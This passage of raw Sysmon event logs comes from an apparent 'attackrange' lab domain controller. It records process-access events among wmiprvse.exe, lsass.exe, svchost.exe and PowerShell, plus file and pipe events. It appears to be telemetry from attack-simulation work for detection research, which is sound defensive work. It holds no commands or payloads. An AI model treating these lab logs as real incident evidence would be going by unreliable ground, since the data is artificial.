System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.670{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A383E059D6EE9328E731B8D8F8447CD6,SHA256=4B2752FB93BD83E8252B828CE2DAB48E99258A83516B4E6F9BB26AEFEF452DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.474{05ADC7E1-6D65-603E-88AA-00000000AD01}15708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.418{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B3D173782D0B477E57F705C67F93E0E,SHA256=AC8CCBF8A22E6B1387835801C1A81CE8C3AB7CD8EC2B167BC06E12A0D25B709B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.374{05ADC7E1-6D65-603E-86AA-00000000AD01}8004ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.374{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.374{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.325{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.325{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002237945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:53.293{05ADC7E1-6D65-603E-88AA-00000000AD01}15708\PSHost.132591775731646315.15708.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002237944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-6D65-603E-88AA-00000000AD01}15708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_r0m5ggmd.551.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-6D65-603E-88AA-00000000AD01}15708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nmykqewc.4vr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-6D64-603E-84AA-00000000AD01}9536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002237939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.274{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nmykqewc.4vr.ps12021-03-02 16:52:53.274 23542300x80000000000000002237938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.265{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEF1099983918DDA0CEDD7A9EE2A9BE,SHA256=684E2790B9738427B6C485436C8826AF68C013BC66462A508BE46FEF5A267252,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.247{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.247{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-89AA-00000000AD01}14100C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.247{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.247{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-87AA-00000000AD01}5196C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.247{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 